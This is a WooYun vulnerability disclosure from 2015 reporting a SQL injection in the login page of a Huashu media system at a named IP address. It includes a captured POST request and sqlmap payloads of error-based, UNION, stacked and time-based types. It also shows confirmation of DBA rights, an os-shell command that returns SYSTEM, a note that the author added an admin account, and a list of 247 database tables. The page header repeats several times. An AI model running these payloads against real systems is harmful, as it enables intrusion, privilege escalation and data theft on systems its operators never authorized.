华数某系统存在SQL注入 | wooyun-2015-0121959| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121959

漏洞标题：华数某系统存在SQL注入

漏洞作者： ❤

提交时间：2015-06-23 15:49

修复时间：2015-06-28 15:50

公开时间：2015-06-28 15:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-23：细节已通知厂商并且等待厂商处理中
2015-06-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

地址：http://218.108.255.183/UserLogin/Login.aspx
POST注入
登录抓包：

POST /UserLogin/Login.aspx HTTP/1.1
Host: 218.108.255.183
Proxy-Connection: keep-alive
Content-Length: 204
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://218.108.255.183
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://218.108.255.183/UserLogin/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hfivawitao0pgzzcqewfst45; JSESSIONID=1wx3gyfq326t51xahj4mziimtt; ems.userName=admin; ems.rememberName=true
__VIEWSTATE=%2FwEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw%2BBISbkwo%3D&__EVENTVALIDATION=%2FwEWBAKHhpR8Au3yj58JAvfEm%2BEEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0%3D&hidSubmit=Login&txt_UserName=aaa&txt_Pwd=aaa

POST注入，DBA权限：

sts:
---
Place: POST
Parameter: txt_UserName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa' AND 5524=CONVERT(INT,(CHAR(58) CHAR(105) CHAR
(102) CHAR(116) CHAR(58) (SELECT (CASE WHEN (5524=5524) THEN CHAR(49) ELSE CHAR(
48) END)) CHAR(58) CHAR(105) CHAR(104) CHAR(111) CHAR(58))) AND 'gqgC'='gqgC&txt
_Pwd=aaa
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=-6445' UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(10
5) CHAR(102) CHAR(116) CHAR(58) CHAR(98) CHAR(108) CHAR(72) CHAR(108) CHAR(65) C
HAR(104) CHAR(100) CHAR(110) CHAR(81) CHAR(79) CHAR(58) CHAR(105) CHAR(104) CHAR
(111) CHAR(58),NULL,NULL,NULL-- &txt_Pwd=aaa
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa'; WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa' WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa
---
[16:04:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:04:03] [INFO] testing if current user is DBA
current user is DBA:    True
[16:04:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:04:03] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\218.108.255.183'
[*] shutting down at 16:04:03

DBA可以直接执行CMD命令：

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[16:11:59] [INFO] the SQL query used returns 1 entries
[16:12:00] [INFO] retrieved: "nt authority\\\\system"
command standard output [1]:
[*] nt authority\system
os-shell>

可以添加管理账户,
我添加了个wooyun/test123
列下数据库:

available databases [7]:
[*] master
[*] model
[*] msdb
[*] RMSS
[*] RMSS20140825
[*] RMSS_TEST
[*] tempdb

表名:

Database: RMSS
[247 tables]
+-------------------------------+
| 1111111                       |
| AssemblyAddress_List          |
| AssemblyPortSource_Details    |
| AssemblyPortSource_Details_Mb |
| AssemblyPortSource_Master     |
| Assembly_Details              |
| Assembly_List                 |
| CMTS                          |
| Cabinet_Info                  |
| ClientTypeA                   |
| ClientTypeALocal              |
| Client_Info                   |
| Equipment_AdrDistribute       |
| Equipment_Borrow              |
| Equipment_Info                |
| Equipment_Resource            |
| Exit_LinkLayer                |
| F_sjzd                        |
| Ggglll_Info                   |
| Ggjf_GggL_List                |
| Ggjf_GggL_details             |
| Ggjf_Jfsgd_List               |
| Ggjf_Jfsgd_details            |
| Gz_pb                         |
| Gz_pbgl                       |
| Gzcl_Gzbg                     |
| Gzcl_Gzcc                     |
| Gzcl_Gzlx                     |
| Gzcl_Gzly                     |
| Gzcl_Gzpg                     |
| Gzcl_Gztzsj                   |
| Gzgl_GzdjSet                  |
| Gzgl_Gzzy                     |
| Gzl_Cszy                      |
| Gzl_Gjsq                      |
| Gzl_Gjsq_wj                   |
| Gzl_Glzy                      |
| Gzl_Gzts                      |
| Gzl_Gzts_Cllc                 |
| Gzl_Gzts_CsNote               |
| Gzl_Gzts_Gzzt                 |
| Gzl_IPwgzy                    |
| Gzl_Jfsg                      |
| Gzl_Jfzy                      |
| Gzl_Lcqd                      |
| Gzl_Xtbg                      |
| Gzl_xtbg_hcysz                |
| Gztz_Cstz                     |
| GzzjDetail                    |
| GzzjMaster                    |
| IP_Bussiness                  |
| IP_Bussiness_Restore          |
| IP_Distribute                 |
| IP_Explorer                   |
| IP_Free_Info                  |
| IP_Restore_Info               |
| IP_Source_Master              |
| IP_VPN_Distribute             |
| JG_Resource                   |
| Jkgl_JkSb                     |
| Jkgl_Jkd                      |
| Jkgl_Khzy                     |
| Jkgl_Ywpz                     |
| Jkgl_Ywpz_gl                  |
| Jrlx_List                     |
| Keep_Watch_Group              |
| Kh_Update_Log                 |
| Ly_Ht                         |
| Ly_Lyxx                       |
| Ly_Wygs                       |
| MachineRoom                   |
| MyGroups                      |
| MyGroups_Items                |
| MyWork_NewPbgl                |
| NDTV_Equipment                |
| Numeral_TV                    |
| OA_Files                      |
| OA_Info                       |
| OA_tx                         |
| ONU_Dk                        |
| ONU_Dk_Mb                     |
| PVCID                         |
| PVCID_Distribute              |
| RoleGroup                     |
| RoleItems                     |
| SMS_History                   |
| SMS_LOG                       |
| SMS_NotePad                   |
| SMS_Phrase                    |
| SMS_Team                      |
| SMS_TempPhone                 |
| SYS_Calendar                  |
| SYS_Calendar_Item             |
| SYS_CurrUserList              |
| SYS_FILE                      |
| SYS_GROUPS                    |
| SYS_Image                     |
| SYS_Lcsq                      |
| SYS_Lcsq_Gly                  |
| SYS_Lcsq_Glyqx                |
| SYS_Log                       |
| SYS_MsgTable                  |
| SYS_PKeyInfo                  |
| SYS_RULES                     |
| SYS_TABLE                     |
| SYS_TABLE_FIELD               |
| SYS_TaxClient                 |
| SYS_USERS                     |
| SYS_WFCAT                     |
| SYS_WFS                       |
| SYS_WFS_Controls              |
| SYS_WFS_LINKS                 |
| SYS_WFS_Nodes                 |
| SYS_WFS_TABLES                |
| SYS_WFS_UNITS                 |
| SYS_WFS_USERS                 |
| SYS_WF_Cscd                   |
| SYS_WF_MAIL_SMS               |
| SYS_WF_PRCLNKS                |
| SYS_WF_PRCS                   |
| SYS_WF_SHARE                  |
| SYS_WF_State                  |
| SYS_WF_State_Folder           |
| SYS_WF_TASKS                  |
| SYS_WF_Task_Master            |
| SYS_WF_Url                    |
| SbIpzygl                      |
| Signature                     |
| Spur_Track_Info               |
| Sys_Mlcsq                     |
| Sys_Values                    |
| Sys_Wfs_Add                   |
| TCP_TOR                       |
| TS_ZD                         |
| TS_ZD_Info                    |
| T_Gw_User                     |
| T_User                        |
| T_User_Gwmc                   |
| T_dzxxgh                      |
| T_dzztgh                      |
| T_vlan                        |
| TaskDetail                    |
| TaskMaster                    |
| TaskPrivilege                 |
| Te_UserSelect                 |
| Transfers_Details             |
| Transfers_Info                |
| Ts_DataBackup                 |
| Ts_DataType                   |
| Ts_Dep_menu                   |
| Ts_E_Dep_menu                 |
| Ts_Gllx                       |
| Ts_Kh1                        |
| Ts_Logs                       |
| Ts_UserRight                  |
| Ts_fz                         |
| Ts_onLineUser                 |
| Ts_sys_menu                   |
| Ts_userGroup                  |
| Ts_userGroupRight             |
| Ts_userGroup_info             |
| VPN_Resource                  |
| V_GsbDk                       |
| Vlan_Distribute               |
| Vlan_Restore                  |
| Watch_Info                    |
| DataBase                      |
| assmblyportsource_master_bz   |
| bs_code                       |
| ckll_backup                   |
| config                        |
| device                        |
| dtproperties                  |
| fav_dir                       |
| fav_link                      |
| file_temp                     |
| frjfb                         |
| frjrjft                       |
| ggjfjrsb                      |
| ip_bussiness1                 |
| ip_store                      |
| ip_store_23                   |
| ip_store_orign                |
| kb_Files                      |
| kb_Files_Attachments          |
| kb_Folders                    |
| kb_FoldersFiles               |
| kb_Folders_AttachmentUser     |
| kb_Folders_Privilege          |
| kb_Privilege_Templates        |
| kb_ProjectDocument            |
| kb_files_Comment              |
| kb_files_Reader               |
| kb_files_Recommend            |
| msn_dysw                      |
| msn_gongzuo                   |
| mylcsq                        |
| mylcsq_prcs                   |
| news                          |
| newsAnnex                     |
| play_evolutions               |
| ref                           |
| ref_ip                        |
| selfuseing_ip                 |
| sqlmapoutput                  |
| sys_dwzt                      |
| sysdiagrams                   |
| t                             |
| temp_mylc                     |
| temp_mywork                   |
| tmp_ipbussinessid             |
| todete                        |
| ts_GroupFzzjRight             |
| ts_GroupHyRight               |
| ts_GroupQyRight               |
| ts_HyRight                    |
| ts_QyRight                    |
| ts_fzzg_right                 |
| ts_kh                         |
| ts_kh_ORA                     |
| ts_kh_restore                 |
| ts_kh_tmp                     |
| v_Kh_Lx                       |
| v_Kh_Rank                     |
| v_UserInfo                    |
| v_wt_all                      |
| vlan_temp1                    |
| vlan_temp2                    |
| voip_ip_store                 |
| vw_DepGzzj                    |
| vw_DepTask                    |
| vw_GggL_List                  |
| vw_PersonGzzj                 |
| vw_PersonTask                 |
| vw_gztj                       |
| vw_hotArticle                 |
| vw_iP_Restore_Info            |
| vw_ip_distribute              |
| vw_ip_free                    |
| vw_ip_source_master           |
| vw_kb_FilesProjects           |
| vw_newArticle                 |
| vw_recommandArticle           |
| vw_sbly_List                  |
| vw_zww_IP_Restore_Info        |
| vw_zww_ip_distribute          |
| vw_zww_ip_source_master       |
+-------------------------------+

漏洞证明：

修复方案：

版权声明：转载请注明来源 ❤@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-06-28 15:50

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121959

漏洞标题：华数某系统存在SQL注入

相关厂商：华数传媒网络有限公司

漏洞作者： ❤

提交时间：2015-06-23 15:49

修复时间：2015-06-28 15:50

公开时间：2015-06-28 15:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ❤@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121959

漏洞标题：华数某系统存在SQL注入

相关厂商：华数传媒网络有限公司

漏洞作者： ❤

提交时间：2015-06-23 15:49

修复时间：2015-06-28 15:50

公开时间：2015-06-28 15:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0121959"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ❤@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：